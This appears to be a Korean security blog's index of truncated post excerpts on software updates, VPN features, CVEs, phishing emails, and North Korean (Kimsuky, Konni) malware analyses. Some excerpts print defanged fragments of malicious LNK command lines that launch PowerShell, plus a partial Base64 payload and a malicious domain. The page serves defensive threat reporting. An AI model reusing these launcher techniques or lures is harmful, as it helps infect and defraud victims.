모질라 재단에서 제공을 하는 브라우저인 파이어폭스에서 윈도우 7 운영체제를 사용하는 다른 브라우저들은 지원을 끊어서 브라우저 보안 업데이트 및 기타 지원을 받지 못했습니다. 다만, 예외적인지 모르겠지만, 파이어폭스는 115를 통해 Windows 7을 계속 지원하고 있었습니다.이제 모질라에서도 이제는 2년이라는 시간을 주었으니 윈도우 11로 넘어가라고 하는 것 같습니다.Firefox 115 ESR은 2025년 9월까지 지원되며 해당 파이어폭스를 실행하는 사용자는 2025년 9월까지 보안 업데이트를 계속 받게 될 것입니다.Windows 8.1 및 MacOS 10.12 ~ 10.14에도 동일하게 적용하게 적용이 됩니다.September 16까지 ESR 은 지원을 받게 됩니다. 뭐 전 세계적으로 아직도 윈도우 ..
오늘은 북한 해킹 그룹 코니(KONNI)에서 만든 악성코드-가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk(2025.1.23)에 대해서 알아보겠습니다.파일명:가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk.lnk사이즈:353,581,378 BytesMD5:e37c8f6aba686aab3d7ecedbd1d0ef43SHA-256:5a8ecafbd5809000334bf5b940a497d0ed750dd11da8a03796f5ce53257cc892악성코드에 포함된 파워셀 코드StringData{ namestring: hwp File relativepath: not present workingdir: not present commandlinearguments:/c for /f "toke..
오늘은 애플에서 제공하는 OS인 macOS 및 iOS 취약점인 CVE-2024-54507에 대해 알아보겠습니다.해당 취약점은 BSD sysctl 인터페이스를 통한 잘못된 메모리 접근 때문에 발생하면 악의적인 목적이 있는 공격자는 커널 메모리 일부 내용을 읽을 수가 있는 문제점입니다.취약점은 sysctl_udp_log_port 함수가 oid_arg1 변수를 잘못된 데이터 타입으로 캐스팅하면서 발생합니다. 해당 변수는 원래 uint16_t 타입으로 정의되어야 하지만, 코드에서는 이를 int로 캐스팅하여 2바이트 초과 데이터를 읽어 버리는 문제입니다.sysctl_handle_int 함수 호출 시 사용자 공간(user space)으로 2바이트의 커널 메모리 이 되는 문제점입니다.int new_value = *(..
오늘은 노드 VPN(Nord VPN)에서 제공을 하는 새로운 프로토콜인 NordWhisper에 대해 알아보겠습니다.Nordwhisper(제한적 네트워크에 사용하기 위해 Nordvpn이 권장)해당 최신 프로토콜은 Nord VPN 에 추가되었으며 보안을 보장하면서 제한적인 로컬 네트워크 환경을 극복하도록 설계되었습니다. 공항, 카페, 호텔 또는 콘퍼런스에서 발견 한 보안 필터링으로 사무실 또는 캠퍼스 네트워크 및 Wi-Fi 네트워크에서 필터링 된 콘텐츠를 처리할 때 이상적인 프로토콜입니다.Nordwhisper는 Meshnet, DIP,난독 화 된 서버, VPN의 Tor 또는 P2P 서버와 호환되지 않습니다.동작 원리NordWhisper는 웹 터널 기술에 기반을 두고 있습니다.OpenVPN이나 WireGuar..
엔비디아의 GPU 도구들에서 발견된 CVE-2025-23359 이며 해당 취약점은Linux 용 NVIDIA 컨테이너 툴킷 에는 기본 구성과 함께 사용될 때 TOCTOU (Check)가 사용 시간 (TOCTOU) 취약점이 포함되어 있으며 제작된 컨테이너 이미지가 호스트 파일 시스템에 액세스 할 수 있으며 해당 취약점을 성공적으로 악용하며 코드 실행, 서비스 거부, 권한 에스컬레이션, 정보 공개 및 데이터 변조로 이어질 수 있음GPU 도구들이란 컨테이너툴킷(Container Toolkit)과 GPU 오퍼레이터(GPU Operator) 이야기합니다.무~해결 방법은 보안 업데이트 입니다.NVIDIA 컨테이너 툴킷:리눅스:1.17.3까지 모든 버전:1.17.4NVIDIA GPU 연산자: 리눅스: 24.9.1까지 ..
오늘은 마이크로소프트에서 제공하는 윈도우 10,윈도우 11 에 대한 각각 보안 업데이트 및 새로운 기능 업데이트가 진행이 되었습니다.윈도우 11 같은 경우보안 업데이트를 설치하고 Windows 11 24H2 ( KB5051987 )는 빌드 번호가 26100.3194 빌드로 변경되며 23H2 ( KB5051989 )는 226x1.4890으로 변경이 됩니다.커서가 작업 표시 줄의 앱을 가리킬 때 표시되는 미리보기를 향상업데이트는 또한 애니메이션을 향상Windows Studio Effect:지원하는 앱을 사용하면 시스템 트레이에 아이콘이 나타남NPU)가있는 장치에서만 사용 가능아이콘을 선택하여 빠른 설정에서 스튜디오 효과 페이지 열며 되며 카메라를 사용하는 앱을 보려면 툴팁의 아이콘 위로 마우스를 가져 옵니다..
ClickFix(클릭픽스)는 최근 사이버 공격자들이 사용하는 새로운 사회공학적 기법으로 사용자를 속여 악성 코드를 실행하도록 유도하는 수법입니다. 지난번에 소개해 드린 루마스틸러 하고 거의 똑같으며 그리고 최근 북한에서도 해당 방법을 악용해서 해외에서 공격을 하고 있습니다. 오늘은 가짜 클라우드파이어(Cloudflare)를 사칭을 하는 녀석을 알아보겠습니다.해당 악성코드 사이트hxxps://kvndbb3(.)com일단 해당 사이트에 접속을 해보면 다음과 같은 내용을 확인을 할수가 있습니다.Verify you are human by completing the action below.kvndbb3(.)com needs to review the security of your connection before p..
오늘은 네이버 전자 문서 사칭 피싱 메일-새로 도착한 세무안내서를 확인하세요.(2025.1.27)에 대해 알아보겠습니다.해당 내용은 마치 국세청에서 이메일 보낸 것처럼 되어 있지만, 가짜 즉 피싱입니다피싱 메일 내용새로운 전자문서가 도착했어요. 인증기한이 지나면 문서를 확인할 수 없으니 꼭 기한 내에 확인하세요.2단계 인증을 이용하시는 분들은 앱에 오는 알림을 탭 해주세요.발송기관 국세청 세무조사위원회 전자문서 종류 전자통지서 인증기한 2025-02-10 00:10:02기한 내 열람하지 않으면 발송기관정책에 따라 다른 수단(종이우편, SMS/LMS 등) 또는 다른 채널(타사앱)로 발송됩니다. 기관에서 정식 발송된 문서는 너lㅇl버앱>Na.앱> 전자문서에 표시됩니다. 일단 내용을 잘 보면 네이버 전자문..
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 종신안내장 으로 위장한 악성코드-종신안내장v02_곽X환d.zip(2025.2.5)에 대해 글을 적어보겠습니다.일단 일단 PDF 파일인 것처럼 돼 있지만, 사실은 PDF 파일이 아닌 그냥 링크 파일 아니다. 해당 악성코드 해쉬값은 다음과 같습니다.파일명:종신안내장v02_곽X환d.zip사이즈:6,427 BytesMD5:40837012253331958723dda63fdfabffSHA-256:079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34Base64 인코딩JGhoaCA9IEpvaW4tUGF0aCAoW1N(5)c3Rl(b)S5JTy5QYXRoXTo6R2V0VGVtcFBh(d)Ggo..
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 거래명세서(2024,10,02)에 대해 글을 적어보겠습니다.먼저 악성코드 해쉬값은 다음과 같습니다.파일명:거래명세서 [2024.09].xlsx.lnk사이즈:318,168 BytesMD5:cdb9a352597f10b8539d61c4b7f4d64cSHA-1:8b6bf5f4ec7045386ee8a0335b7ab7059fe3cf9eSHA-256:acbc775087da23725c3d783311d5f5083c93658de392c17994a9151447ac2b63일단 해당 LNK 파일은 엑셀로 속이는 척하는 것을 볼 수가 있으며 안에 보면 Base64 로 인코딩이 돼 있는 것을 확인할 수가 있습니다.Base64 디코딩$hhh = Join-(P)ath..
모질라 재단에서 제공을 하는 브라우저이 파이어폭스(Firefox)에 대한 보안 업데이트 및 새로운 기능 업데이트가 진행이 되었습니다.하이라이트로는 한국, 일본, 중국 및 러시아 어 번역, 사이트별 브라우저 기록 남용에 대한 보호, AI 챗봇 액세스가 넓어지고 새로운 탭 레이아웃 새로 고침이 롤아웃되는 등 하이라이트가 포함되었습니다.내장 번역 기능은 릴리스의 일부로 4 개의 새로운 언어를 지원Firefox의 번역 기능은 로컬에서 실행되므로 특별하게 느껴지면 원격 인터넷 서버에 정보가 없어도 개인 정보 보호에 유리한 것이 장점입니다.단점은 언어 팩이 필요하고, 번역 기능을 사용할 수 있기 전에 사용자가 내려받기 해야 합니다. 다만, 한국어->영어 같은 걸로 변환이 되지만 영어->한국어는 안 되는 것 같습니다..
오늘은 노드 VPN 스마트폰 IP 우회 변경 사용법(3개월 무료)에 대해 글을 적어보겠습니다. NordVPN은 유료 개인용 가상사설망 서버 이며 윈도우,MacOS,리눅스를 지원을 하고 있으며 스마트폰에서는 안드로이드와 iOS 를 지원을 하고 있습니다. 그리고 안드로이드 TV에서 사용할 수가 있습니다.노드 VPN의 본사는 데이터 보존법의 의무가 없으며 여기서 제일 중요한 것은 5개의 눈(Five Eyes), 14개의 눈 (Fourteen Eyes) 해당 동맹에서 안전하며 파나마에 있습니다.그리고 2019년 10월 29일 노드 VPN은 노-로그 감사 보고서를 공개 보안 컨설팅 회사와 파트너십을 맺고 램 서버로 인프라 교체, 버그 바운티 프로그램 그리고 2022년 6월에서는 인도는 VPN 회사와 ISP에게 5..
오늘은 언제나 존경도 하지도 않고 경애도 하지 않는 북한 정찰총국 산하 해킹 조직인 김수키(Kimsuky) 에서 만든 악성코드인 241002-2024년 GA영업본부 담당지점 배분(10월)(2025.1.31) 에 대해 알아보겠습니다.파일명: 241002-2024년 GA영업본부 담당지점 배분(10월) v2.pdf.lnk사이즈: 318,318 BytesMD5: 8a08fd5e8298c823e4ab356508d70490SHA-1: 086be54505ef95d83be71d6b1e959610d36dc619SHA-256: 71d56c61b765eee74dca65910ab9e0e2b35b21bcf6c97241ca7188a75f082f6f해당 악성코드는 일단 기본적으로 파워셸(PowerShell)를 악용을 하고 있으며 ..
오늘은 간편 로그인(소셜 로그인)은 문제점 애 대해 글을 적어 보겠습니다.인터넷에서 다른 서비스의 계정에 기대어 새로운 계정을 만들거나 계정에 접속하는 것입니다.서비스별로 아이디와 암호를 모두 외우는 대신 뿌리계정 하나의 아이디와 암호만 외우는 게 서비스 이용자에게 훨씬 쉬워서 빠르게 접속을 하게 만들어 사용하게 하여졌습니다. 한국에서 쓸 수 있는 대표적인 간편 로그인은 아마도 구글, 페이스북, 트위터, 애플, 네이버, 카카오, 삼성일 것입니다. 해당 계정을 사용하면 정말 편리하게 사용을 할 수가 있습니다.물론 편리한 만큼 대가가 있습니다. 계정이 연결되어 있기 때문에 한 계정에 문제가 생기면 다른 계정에도 영향을 주게 되고 계정 데이터를 지울 때도 뿌리 계정을 지우더라도 소셜 로그인한 계정의 데이터는 ..
오늘은 삼성 갤럭시 S24,삼성 갤럭시 S23(Galaxy S24/S23 Explain) 대상으로 하는 취약점 CVE-2024-49415 취약점에 대해 알아보겠습니다. 일단 갤럭시 S23, S24 시리즈뿐만 아니라 안드로이드 12, 안드로이드 13, 안드로이드 14 운영체제를 사용하고 Zero-Click RCE(제로클릭RCE)로 악용될 가능성이 있는 OOB Write 취약점이 발견되었고 해당 취약점 코드에 대한 공개가 되었으며 당연히 보안 업데이트도 같이 진행이 되었습니다.취약점은 Monkey’s Audio(APE) 파일의 디코더인 libsaped.so의 saped_rec 함수에 존재하게 됩니다. Monkey의 오디오는 알고리즘 및 파일 형식 위한 무손실 오디오 데이터 압축입니다.공개된 취약점 코드는 다..
오늘은 김수키(Kimsuky)로 추정이 되는 카카오 고객센터 피싱 메일(2024.12.16)에 대해 분석을 한번 해보겠습니다.이메일 내용은 다음과 같습니다.kakao 계정 회원님의 아이디가 휴면 상태로 전환될 예정입니다. 해당 메일을 수신 받은 후 1개월 이내에 본인확인을 하지 않으면, 회원님의 아이디가 휴면 아이디로 전환되는 점을 알려드립니다. --------------------------------------------------------------------------------아이디 :?@hanmail(.)net 휴면 아이디 전환 예정일 : 2025년 1월 12일 별도 분리 보관되는 개인정보 항목 : 아이디 및 회원정보 -------------------------------------..
오늘은 Kimsuky(김수키)로 추측이 되는 부가가치세 확정신고 납부 통지서 피싱 메일 분석(2025.1.20)을 간단하게 분석을 해 보겠습니다.일단 해당 이메일 내용부터 보겠습니다.2024.2기 부가가치세 확정신고 납부 통지서(이)가 도착했어요.f????****님, 지금 확인해 보세요. 발송기관국세청 전자문서 종류 [국세청]2024.2기 부가가치세 확정신고 납부 통지서 인증기한 2025-01-31 23:59까지 기한 내 열람하지 않으면 발송기관 정책에 따라 다른 수단(종이우편, SMS/LMS 등) 또는 다른 채널(타사앱)로 발송됩니다.기관에서 정식 발송된 문서는네이버앱 에서 Na. 에서 전자문서에 표시됩니다.확인하러 가기네이버는 과학기술정보통신부로부터 인증받은 공인전자문서중계자로, 국세청의 종이..
오늘은 DeepSeek(深度求索, 심도구색)은 중국의 헤지펀드 회사 환팡퀀트(幻方量化) 소속 인공지능 연구 기업의 이름이자 같은 회사에서 개발한 오픈 웨이트(Open-Weights)언어 모델 제품군의 모델명에서 이걸 사용하면 얼마나 개인의 소중한 개인정보를 가져가는지 확인을 해 보겠습니다.DeepSeek Privacy Policy를 읽어보아야 하면 2024.12.5 기준으로 작성된 것을 봅니다.일단 먼저 Hangzhou DeepSeek Artificial Intelligence Co., Ltd., and Beijing DeepSeek Artificial Intelligence Co., Ltd 컨트롤이 있고 지사 있다. OK어떤 정보 가져 가는지 보면….기본 정보: 이름, 이메일, 전화번호, 사용자 ID ..
오늘은 피싱(Phishing) 메일을 통해서 가짜 YouTube(유튜브)로 연결되게 설정이 돼 있는 낚시 메일에 대해 분석을 해보겠습니다.해당 피싱 메일 해쉬파일명:11.eml사이즈:65,662 BytesMD5:22c3f4bdd48227f846774a0198291843SHA-1:202de930ba98ca1371701e3b5c753250251ba1d5SHA-256:9b196220b369c199a7e4d57cb5db18b32eb2565a6f9190929c5c01ac4fa04ac8이메일 내용You don't often get email from kkundlas@shieldmedicalgroup(.)com. Learn why this is important Ross Stores IncYour document..
오늘은 북한 해킹 단체 Konni APT(Advanced Persistant Threat) 에서 만든 악성코드인 오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk(2025.1.7)에 대해 글을 적어 보겠습니다. 북한 정찰총국 산하의 해킹 단체이며 한국과 미국 정부 기관 및 조직을 타겟으로 하고 있습니다.외교 및 군사 기관도 대상으로 하고 있으며 아마도 국세징수법 시행 규칙 양식을 사용하는 것 보니까? 한국 국민을 대상으로 하지 않았을까 조심스럽게 생각을 합니다.해쉬파일명: 오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk사이즈:372,872,757 BytesMD5:c8556d5dd6383b600a459a531beb05ffSHA-1:3024b5438f5d63cded..
TikTok(틱톡)은 트럼프가 오늘 회사가 미국 구매자를 찾는 기한을 90일간 유예하겠다고 발표하고 미국에서 다시 서비스를 재개했습니다.미국 대법원이 만장일치로 TikTok 금지를 허용하기로 한 후 소셜 미디어 회사는 토요일 밤늦게 미국에서 액세스를 차단트럼프는 TikTok이 미국 구매자를 찾을 수 있는 기한을 연장하고 기업이 앱 액세스를 허용하는 데 어떤 책임도 지지 않는 행정 명령에 내일 서명할 것이라고 발표몇 시간 후 TikTok은 트럼프의 도움에 감사하며 미국에서 서비스를 재개틱톡은 다음과 같이 답변을 했습니다.인내심과 지원에 감사드립니다. 트럼프 대통령 노력의 결과로 TikTok이 미국에 돌아왔습니다!"라고 TikTok 앱에 환영 메시지가 적혀 있습니다.앱이 기존 사용자에게 작동하지만, 구글 및..
오늘은 Kimsuky(김수키)에서 만든 공적조서(개인,양식)로 위장한 악성코드인 공적 조서(개인,양식).lnk 에 대해 글을 적어보겠습니다.일단 해당 악성코드는 lnk 파일 형식으로 돼 있으며 해당 악성코드를 열어 보면 PowerShell 로 동작을 합니다.StringData{ namestring: relativepath: not present workingdir: not present commandlinearguments: /k for /f "tok(e)ns=*" %a in ('dir C:\Windows\SysW(o)w64\WindowsPowerS(h)ell\v1.0\*rshel(l).exe /s /b /od') do c(a)ll %a "$dirPath = Get-L..
마이크로소프트에서 제공하는 운영체제인 윈도우 10,윈도우 11 에 대한 보안 업데이트 가 진행이 되었습니다.물론 새로운 기능도 포함입니다.윈도우 10 KB5049981의 새로운 기능Windows 커널 취약 드라이버 차단 목록 파일(DriverSiPolicy.p7b) 정책 파일인 하나의 수정 사항이 나열되어 있음차단 목록 파일에는 Windows에서 상승한 권한을 얻으려고 악용될 수 있는 취약점이 포함된 것으로 알려진 커널 드라이버 목록이 포함돼 있음KB5049981 누적 업데이트와 관련된 몇 가지 알려진 문제첫 번째로 알려진 문제는 업데이트로 인해 OpenSSH(Open Secure Shell) 서비스가 시작되지 않아 SSH 연결이 중단될 수 있다는 것다른 하나는 특정 Citrix 구성 요소 때문에 이 업..
오늘은 우리가 정말로 존경하지 않는 북한 김수키(Kimsuky)에서 만든 코발트 스트라이크(Cobalt Strike) 악성코드-test.zip(2025.1.11)에 대해 글을 적어보겠습니다.해당 악성코드는 다음과 같습니다.파일명:test.zip사이즈:15,282 BytesMD5:8d3dd8b5a883a2080525a11807b2a6e1SHA-1:da3cbfad064e12c4334161a00335c0176011d0c2SHA-256:c2faf67cab95cba996e6b705e9579ffbc53fec55b09064308c2c38dbf6018077Powershell 코드StringData{ namestring: Type: Text Document Size: 391,2KB KB Date modi..
오늘은 북한에서 대한민국 및 해외의 공작활동을 총괄하는 군 소속 첩보기관으로 공작원의 양성, 침투, 정보수집, 파괴공작, 요인암살, 납치, 테? 등 다양한 임무를 수행 아무튼 대한민국 안보에 전혀 도움 안되는 정찰총국 산하의 해킹 단체 김수키(Kimsuky)에서 한국방위산업학회 향한 악성코드인 국방위산업학회 방위산업 디지털 혁신 세미나(계획)(2025.1.12)에 대해 알아보겠습니다.해당 악성코드는 출발은 이메일로 시작하며 이메일 내용은 다음과 같습니다.[최초 수신 메일] 한국방위산업학회 방위산업 디지털 혁신 세미나 계획을 전파 드립니다.안녕하십니까,방산발전을 위해 분투하시는 회원님들의 무궁한 발전을 기원하며 항상 본 학회에 보내주시는 성원에 감사드립니다.2024.12.20(금) 10:00, 육군회관에서..
오늘은 모질라 재단에서 제공을 하는 파이어폭스 134.0 보안 업데이트에 대해 알아보겠습니다.Firefox는 이제 Linux에서 터치패드 누르기 동작을 지원Windows에서 HEVC 비디오 콘텐츠의 하드웨어 가속 재생이 지원Ecosia의 가용성은 오스트리아, 벨기에, 이탈리아, 네덜란드, 스페인, 스웨덴 및 스위스와 함께 독일 지역의 모든 언어로 확장새로워진 새 탭 레이아웃이 미국과 캐나다의 사용자에게 출시되고 있으며 위치가 변경된 로고와 날씨 위젯을 통해 웹 검색,바로 가기, 추천 스토리를 상단에 우선시할 수 있습니다.이번 업데이트로 인해서 추천 스토리 카드 UI 변경 사항이 포함되어 있으며 더 큰 화면을 사용하는 사용자는 최대 4개의 열을 볼 수 있어 공간 활용도가 높아집니다.보안 업데이트 내용CVE..
오늘은 텔레그램 사용자 정책 위반 사칭 피싱(Phishing) 사이트 인 hvil-telegram(.)org(2025.1.6) 에 대해 알아보겠습니다.최근에는 러시아 태생의 니콜라이 두로프(Николай Дуров, Nikolai Durov) 파벨 두로프 형제가 개발하여 2013년 8월에 iOS용으로 처음 출시 현재는 안드로이드,Windows,Windows Phone, 리눅스, macOS, 브라우저까지 지원하는 메신저이며 뭐 보안이 좋다고 하지만 다 허점이 있으며 보안 메신저 들도 한 놈이 사고 치면 다 잡히어져 있습니다.일단 해당 텔레그램은 딥페이크(Deepfake) 때문에 문제가 되는 메신저입니다.일단 해당 텔레그램을 계정이 사용정책이 위반했다고 피싱 사이트로 유도를 하는 방식을 취하고 있습니다.해당..
오늘은 가짜 CAPTCHA(캡차)을 이용한 Lumma Stealer를 통해 유포되는 악성코드에 대해 글을 적어보겠습니다. 해당 Lumma Stealer는 2022년 8월부터 러시아 어 포럼의 MaaS(Malware-as-a-Service) 모델을 통해 제공되었으며 주로 암호화폐 지갑(가상화폐 지갑)과 2단계 인증(2FA) 브라우저 확장 프로그램을 표적으로 삼은 후 궁극적으로 피해자의 컴퓨터에서 중요한 정보를 훔치는 것을 하고 있습니다.Lumma Stealer는 맬웨어 서비스 모델로 운영되므로 구독을 구매할 재정적 여력이 있는 사람이라면 누구나 이용할 수 있으며 손상된 컴퓨터에서 악성코드 활동을 모니터링 하고 관리할 수 있는 명령 및 제어(C2) 패널에 대한 액세스가 포함이 됩니다.일단 간단하게 제가 한번..
NordVPN(노드 VPN) 에서 양자 컴퓨팅에 대한 내성을 위한 새로운 기능인 NordVPN(노드 VPN) 포스트 퀀텀 기능을 추가했습니다.먼저 양자 컴퓨터에 대해 알아보아야 합니다.양자 컴퓨터라는 것은 양자역학에서 양자 얽힘, 중첩, 텔레포테이션 등의 효과를 이용해 계산하는 컴퓨터입니다. 즉 기존의 컴퓨터 0,1 이 아닌 0과 1을 동시에 공존시킬 수가 있는 컴퓨터를 이야기합니다.현존 최고의 슈퍼 컴퓨터가 수백 년이 걸려도 풀기 어려운 문제도 단 몇 초 이내의 어마어마한 속도로 빠르게 풀 수이었어요 가 있는 능력이 부여된다는 뜻이며 이렇게 되면 긍정적인 문제가 있겠지만, 부정적으로 암호들이 쉽게 해독이 될 수가 있다는 것입니다. 즉 기존의 암호는 크게 인수분해, 이산 로그, 타원곡선 이산 로그 문제 ..
오늘은 정체를 모를 APT에서 만든 교통 범칙금 과태료 미납 내역.lnk(2024.7.14)에 대해 글을 적어보겠습니다.파일명: 교통 범칙금 과태료 미납 내역.lnk사이즈:2,680 BytesMD5:354d922cc4b4478d04c215cac5f28c89SHA-1:77943769415809939fb82330d62db96b207df5b9SHA-256:42553efd4d11f721fb221fcf226d4b4aa616e5b0018e246954deb52e0a035cd0악성코드 내용StringData{ namestring: Check (t)he fine relativepath: ..\..\..\Windows\System32\cmd.exe workingdir: %CD% commandlinea..